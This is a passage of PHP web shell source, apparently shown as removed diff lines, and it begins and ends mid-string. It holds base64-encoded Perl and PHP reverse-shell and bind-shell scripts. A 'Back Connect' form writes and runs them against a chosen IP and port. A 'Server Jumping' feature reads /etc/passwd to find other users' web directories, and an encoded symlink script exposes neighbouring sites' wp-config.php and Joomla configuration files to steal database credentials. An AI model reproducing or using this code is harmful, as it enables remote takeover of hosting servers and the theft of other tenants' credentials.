d3JpdGUoJHNvY2ssICRpbnB1dCk7IH0NCn0NCmZjbG9zZSgkc29jayk7DQpmY2xvc2UoJHBpcGVzWzBdKTsNCmZjbG9zZSgkcGlwZXNbMV0pOw0KZmNsb3NlKCRwaXBlc1syXSk7DQpwcm9jX2Nsb3NlKCRwcm9jZXNzKTsNCmZ1bmN0aW9uIHByaW50aXQgKCRzdHJpbmcpIHsgaWYgKCEkZGFlbW9uKSB7IHByaW50ICIkc3RyaW5nXG4iOyB9IH0NCj8+"
- );
- $bp = array(
- "pl" => "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="
- );
- } elseif($win && !$posix){
- $bc = array(
- "pl" => "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgiZWNoby4gJiYgZWNobyA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gJiYgZWNoby4gJiYgY21kIik7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0KY2xvc2UoU1RERVJSKTs=",
- "php" => "PD9waHANCnNldF90aW1lX2xpbWl0ICgwKTsNCi8vaWYoUEhQX1NBUEkgIT0gImNsaSIpIGRpZSgiTm90IEdVSSIpOyANCmlmKCRhcmd2IDwgMSkgZGllKCJJbnZhbGlkIik7DQokaXAgPSAkYXJndlsxXTsgJHBvcnQgPSAkYXJndlsyXTsgJGNodW5rX3NpemUgPSAxNDAwOyAkd3JpdGVfYSA9IG51bGw7ICRlcnJvcl9hID0gbnVsbDsgJHNoZWxsID0gImNtZCI7ICRkYWVtb24gPSAwOyAkZGVidWcgPSAwOw0KaWYgKGZ1bmN0aW9uX2V4aXN0cygncGNudGxfZm9yaycpKSB7DQokcGlkID0gcGNudGxfZm9yaygpOw0KaWYgKCRwaWQgPT0gLTEpIHsgcHJpbnRpdCgiRVJST1I6IENhbid0IGZvcmsiKTsgZXhpdCgxKTsgfQ0KaWYgKCRwaWQpIHsgZXhpdCgwKTsgfQ0KaWYgKHBvc2l4X3NldHNpZCgpID09IC0xKSB7IHByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOyBleGl0KDEpOyB9DQokZGFlbW9uID0gMTsNCn0gZWxzZSB7IHByaW50aXQoIldBUk5JTkc6IEZhaWxlZCB0byBkYWVtb25pc2UuICBUaGlzIGlzIHF1aXRlIGNvbW1vbiBhbmQgbm90IGZhdGFsLiIpOyB9DQovL2NoZGlyKCIvIik7DQp1bWFzaygwKTsNCiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOw0KaWYgKCEkc29jaykgeyBwcmludGl0KCIkZXJyc3RyICgkZXJybm8pIik7IGV4aXQoMSk7IH0NCiRkZXNjcmlwdG9yc3BlYyA9IGFycmF5KDAgPT4gYXJyYXkoInBpcGUiLCAiciIpLDEgPT4gYXJyYXkoInBpcGUiLCAidyIpLDIgPT4gYXJyYXkoInBpcGUiLCAidyIpKTsNCiRwcm9jZXNzID0gcHJvY19vcGVuKCRzaGVsbCwgJGRlc2NyaXB0b3JzcGVjLCAkcGlwZXMpOw0KaWYgKCFpc19yZXNvdXJjZSgkcHJvY2VzcykpIHsgcHJpbnRpdCgiRVJST1I6IENhbid0IHNwYXduIHNoZWxsIik7IGV4aXQoMSk7IH0NCnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzBdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzJdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssIDApOw0KcHJpbnRpdCgiU3VjY2Vzc2Z1bGx5IG9wZW5lZCByZXZlcnNlIHNoZWxsIHRvICRpcDokcG9ydCIpOw0Kd2hpbGUgKDEpIHsgaWYgKGZlb2YoJHNvY2spKSB7IHByaW50aXQoIkVSUk9SOiBTaGVsbCBjb25uZWN0aW9uIHRlcm1pbmF0ZWQiKTsgYnJlYWs7IH0NCmlmIChmZW9mKCRwaXBlc1sxXSkpIHsgcHJpbnRpdCgiRVJST1I6IFNoZWxsIHByb2Nlc3MgdGVybWluYXRlZCIpOyBicmVhazsgfQ0KJHJlYWRfYSA9IGFycmF5KCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7DQokbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9zZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsNCmlmIChpbl9hcnJheSgkc29jaywgJHJlYWRfYSkpIHsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSyBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRzb2NrLCAkY2h1bmtfc2l6ZSk7IGlmICgkZGVidWcpIHByaW50aXQoIlNPQ0s6ICRpbnB1dCIpOyBmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOyB9DQppZiAoaW5fYXJyYXkoJHBpcGVzWzFdLCAkcmVhZF9hKSkgeyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQgUkVBRCIpOyAkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RET1VUOiAkaW5wdXQiKTsgZndyaXRlKCRzb2NrLCAkaW5wdXQpOyB9DQppZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkgeyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERFUlIgUkVBRCIpOyAkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMl0sICRjaHVua19zaXplKTsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RERVJSOiAkaW5wdXQiKTsgZndyaXRlKCRzb2NrLCAkaW5wdXQpOyB9DQp9DQpmY2xvc2UoJHNvY2spOw0KZmNsb3NlKCRwaXBlc1swXSk7DQpmY2xvc2UoJHBpcGVzWzFdKTsNCmZjbG9zZSgkcGlwZXNbMl0pOw0KcHJvY19jbG9zZSgkcHJvY2Vzcyk7DQpmdW5jdGlvbiBwcmludGl0ICgkc3RyaW5nKSB7IGlmICghJGRhZW1vbikgeyBwcmludCAiJHN0cmluZ1xuIjsgfSB9DQo/Pg=="
- );
- $bp = array(
- "pl" => "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9ImNtZCI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCnVzZSBTb2NrZXQ7DQpzb2NrZXQoUywmUEZfSU5FVCwmU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSB8fCBkaWUgIkNhbnQgY3JlYXRlIHNvY2tldFxuIjsNCnNldHNvY2tvcHQoUyxTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKTsNCmJpbmQoUyxzb2NrYWRkcl9pbigkQVJHVlswXSxJTkFERFJfQU5ZKSkgfHwgZGllICJDYW50IG9wZW4gcG9ydFxuIjsNCmxpc3RlbihTLDMpIHx8IGRpZSAiQ2FudCBsaXN0ZW4gcG9ydFxuIjsNCndoaWxlKDEpIHsNCglhY2NlcHQoQ09OTixTKTsNCglpZighKCRwaWQ9Zm9yaykpIHsNCgkJZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0KCQlvcGVuIFNURElOLCI8JkNPTk4iOw0KCQlvcGVuIFNURE9VVCwiPiZDT05OIjsNCgkJb3BlbiBTVERFUlIsIj4mQ09OTiI7DQoJCWV4ZWMgJFNIRUxMIHx8IGRpZSBwcmludCBDT05OICJDYW50IGV4ZWN1dGUgJFNIRUxMXG4iOw0KCQljbG9zZSBDT05OOw0KCQlleGl0IDA7DQoJfQ0KfQ=="
- );
- }
- echo "<form action=\"?cwd=$cwd&action=tools\" method=\"post\">\n".
- " <h1 class=\"cantik\">Shell Tools</h1>\n".
- " <fieldset style=\"width: 40%;\">\n".
- " <legend>Network tools</legend>\n".
- " Back Connect: <br />\n".
- " <input type=\"text\" name=\"BC_ip\" value=\"".((getenv('REMOTE_ADDR')) ? ($_SERVER['REMOTE_ADDR']) : ("127.0.0.1"))."\" placeholder=\"IP Address\" class=\"kotak\">\n".
- " <input type=\"text\" name=\"BC_port\" value=\"31337\" placeholder=\"Port\" class=\"kotak\">\n".
- " <select class=\"kotak\" name=\"BC_mode\"> <option value=\"perl\">Perl</option> <option value=\"php\">PHP</option> </select>\n".
- " <input type=\"submit\" name=\"SubmitBC\" value=\"connect\" class=\"kotak\"> <br />\n".
- " <br />\n".
- " Bind Port to <b>/bin/sh</b>: <br />\n".
- " <input type=\"text\" name=\"BP_port\" value=\"31337\" placeholder=\"Port\" class=\"kotak\">\n".
- " <select class=\"kotak\" name=\"BP_mode\"> <option value=\"perl\">Perl</option> </select>\n".
- " <input type=\"submit\" name=\"SubmitBP\" value=\"bind port\" class=\"kotak\"> <br /><br />\n";
- if(isset($_POST['SubmitBC'])){
- echo "<hr />";
- if(empty($_POST['BC_ip'])) $_POST['BC_ip'] = $_SERVER['REMOTE_ADDR'];
- if(empty($_POST['BC_port'])) $msg = "Port is empty !!";
- elseif($_POST['BC_mode'] == "perl"){
- b64wrt($cwd.".PHHM_files/bc/bc.pl", $bc['pl']);
- if(!$win && $posix){ perintah("chmod +x ".$cwd.".PHHM_files/bc/bc.pl"); }
- perintah("perl ".$cwd.".PHHM_files/bc/bc.pl ".trim($_POST['BC_ip'])." ".trim($_POST['BC_port']));
- $msg = "[BACK CONNECT][PERL] Trying to connect @ ".trim($_POST['BC_ip']).":".trim($_POST['BC_port'])."";
- }
- elseif($_POST['BC_mode'] == "php"){
- b64wrt($cwd.".PHHM_files/bc/bc.php", $bc['php']);
- if(!$win && $posix){ perintah("chmod +x ".$cwd.".PHHM_files/bc/bc.pl"); }
- perintah("php ".$cwd.".PHHM_files/bc/bc.php ".trim($_POST['BC_ip'])." ".trim($_POST['BC_port']));
- $msg = "[BACK CONNECT][PHP] Trying to connect @ ".trim($_POST['BC_ip']).":".trim($_POST['BC_port'])."";
- }
- echo $msg;
- } elseif(isset($_POST['SubmitBP'])){
- if(empty($_POST['BP_port'])) $msg = "Port is empty !!";
- elseif($_POST['BP_mode'] == "perl"){
- b64wrt("bp.pl", $bp['pl']);
- if(!$win && $posix){ perintah("chmod +x bp.pl"); }
- perintah("perl bp.pl ".trim($_POST['BP_port'])."");
- $msg = "[PORT BIND][PERL] Trying to bind port <b>(".trim($_POST['BP_port']).")</b> @ ".$_SERVER['SERVER_ADDR']."";
- }
- echo $msg;
- }
- echo " </fieldset>\n".
- " <br />\n".
- " <fieldset style=\"width: 40%;\">\n".
- " <legend>File/Directory NOT Writable? Permission Denied when saving file? Try this − File permission checker</legend>\n".
- " <input type=\"text\" name=\"dir2chk\" value=\"$cwd\" class=\"kotak\" size=\"40%\" />\n".
- " <input type=\"submit\" name=\"SubmitCHK\" value=\"Scan...!!!\" class=\"kotak\" /><br />\n";
- if(isset($_POST['SubmitCHK'])){
- if($_POST['dir2chk'] == ""){ $_POST['dir2chk'] = $cwd; }
- echo "<hr />Scanning folder <b>".magicboom($_POST['dir2chk'])."</b> ....<br /><br />";
- $dcount = 0; $fcount = 0; $msg = "";
- if($a = opendir(magicboom($_POST['dir2chk']))){
- while($b = readdir($a)){
- if(is_dir($b)){
- if(is_writable($b)){
- $msg .= "DIR ".$b." is writable !<br />\n";
- $dcount++;
- }
- }
- elseif(is_file($b)){
- if(is_writable($b)){
- $msg .= "FILE ".$b." is writable !<br />\n";
- $fcount++;
- }
- }
- }
- closedir($a);
- echo $msg;
- echo "<hr />";
- if($fcount < 2){ echo $fcount." Writable file found !<br />\n"; } else { echo $fcount." Writable files found !<br />\n"; }
- if($dcount < 2){ echo $fcount." Writable directory found !<br />\n"; } else { echo $dcount." Writable directories found !<br />\n"; }
- }
- }
- echo "</fieldset>".
- "</form>";
- true;
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "jumping"){
- echo "\n\n<form action=\"?cwd=".$cwd."&action=jumping\" method=\"post\">\n";
- echo "<h1 class=\"cantik\">Server Jumping</h1>";
- $exp = explode(DIRECTORY_SEPARATOR, $cwd);
- if($exp[3] != "public_html" || $win){
- echo "Can't jump on this server - Path is not <b>the-regular-/home/user/public_html</b> or you are running on a <b>Windows</b> server. <br />";
- echo "Thank you for using this shell :)";
- exit;
- } elseif($safemode) {
- echo "Safe Mode is enabled... Bypass it first";
- exit;
- } elseif($exp[3] == "public_html" && $posix && !$win) {
- $pub = array();
- foreach(file("/etc/passwd") as $row){
- $kaun = 0;
- $pecah = explode(":", $row);
- for($c=0; $c<count($pecah[0])+1; $c++){
- if(is_readable("/home/".$pecah[$c]."/public_html/")){
- array_push($pub, "/home/".$pecah[$c]."/public_html/");
- echo "[+] Readable − <a href=\"?cwd=/home/".$pecah[$c]."/public_html/\" title=\"/home/".$pecah[$c]."/public_html/\" target=\"_blank\">/home/".$pecah[$c]."/public_html/</a><br />\n";
- }
- }
- }
- echo "Found ".sizeof($pub)." readable DIR";
- }
- echo "</form>";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "sym_menu"){
- if(is_writable($cwd)){
- if(!is_dir($cwd.".PHHM_files")){ mkdir($cwd.".PHHM_files", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym")){ mkdir($cwd.".PHHM_files/sym", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym/perl")){ mkdir($cwd.".PHHM_files/sym/perl", 0777); }
- if(!is_dir($cwd.".PHHM_files/sym/php")){ mkdir($cwd.".PHHM_files/sym/php", 0777); }
- if(!is_dir($cwd.".PHHM_files/bc")){ mkdir($cwd.".PHHM_files/bc", 0777); }
- }
- echo "<form action=\"?cwd=".$cwd."&action=sym_menu\" method=\"post\">\n".
- "<h1 class=\"cantik\">Symlink Menu</h1>\n".
- "− Symlink configuration files using....: <br />\n".
- "[ <a href=\"?cwd=".$cwd."&action=sym_auto_perl\" title=\"Symlink configuration files using PERL script\">PERL</a> ]\n".
- "[ <a href=\"?cwd=".$cwd."&action=sym_auto_php\" title=\"Symlink configuration files using PHP script\">PHP</a> ]\n".
- "</form>";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "sym_auto_perl"){
- if(!is_file($cwd.".PHHM_files/sym/perl/.htaccess")){
- b64wrt($cwd.".PHHM_files/sym/perl/.htaccess", "T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuaGF4DQpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLmhheA0KQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5oYXg=");
- }
- if(!is_file($cwd.".PHHM_files/sym/perl/config.hax")){
- b64wrt($cwd.".PHHM_files/sym/perl/config.hax", "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5Db25maWcgUFdOPC90aXRsZT4NCjxsaW5rIGhyZWY9Imh0dHA6Ly9pY29ucy5pY29uc2Vla2VyLmNvbS9wbmcvZnVsbHNpemUvaGFsbG93ZWVuL3NrdWxsLnBuZyIgcmVsPSJpY29uIiB0eXBlPSJpbWFnZS94LXBuZyIgLz4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCglvdmVyZmxvdy14OiBoaWRkZW47DQoJb3ZlcmZsb3cteTogaGlkZGVuOw0KfQ0KLmR6IHsNCiAgICBmb250LWZhbWlseTogVGFob21hOw0KICAgIGZvbnQtc2l6ZTogMTRweDsNCiAgICBmb250LXdlaWdodDogYm9sZDsNCiAgICBjb2xvcjogIzMzMzNGRjsNCiAgICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogICAgdGV4dC1zaGFkb3c6IGJsYWNrIDBweCAwcHggMnB4Ow0KfQ0KI2NoZWNrb3V0dGV4dGFyZWEgeyB3ZWJraXQtYm9yZGVyLXJhZGl1czogMTVweDsgfQ0KaG92ZXIjY2hlY2tvdXR0ZXh0YXJlYSB7IG9wYWNpdHk6IDAuNjsgYmFja2dyb3VuZC1jb2xvcjozMzMzMzMgfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCic7DQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiRtc3IgPSBxeHtwd2R9Ow0KJGhhaGFnYXk9JG1zci4iLyIuJHVzZXI7DQokaGFoYWdheT1+cy9cbi8vZzsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGhhaGFnYXkuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRoYWhhZ2F5Lictc2hvcC1vcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkaGFoYWdheS4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGhhaGFnYXkuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRoYWhhZ2F5Lictb3Njb21tZXJjZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcC9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkaGFoYWdheS4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRoYWhhZ2F5Lictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRoYWhhZ2F5Lictc2FsZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywkaGFoYWdheS4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRoYWhhZ2F5LictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRoYWhhZ2F5LictMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkaGFoYWdheS4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkaGFoYWdheS4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGhhaGFnYXkuJy01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRoYWhhZ2F5LictNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwMTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cDEzLXdwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dQL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AxMy1XUC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AxMy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cDEzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJlc3Mvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwMTMtd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwMTMtV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AxMy13b3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AxMy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwMTMtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC1ibG9nLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AtYmxvZ3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AtcHJvdGFsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC1tYWluLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Rlc3Qvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC10ZXN0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGhhaGFnYXkuJy02LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZGIucGhwJywkaGFoYWdheS4nLTcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29ubmVjdC5waHAnLCRoYWhhZ2F5LictOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGhhaGFnYXkuJy05LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsJGhhaGFnYXkuJy0xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vbWxhMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb28vY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1qb29tbGEtY21zLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1qb29tbGEtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdz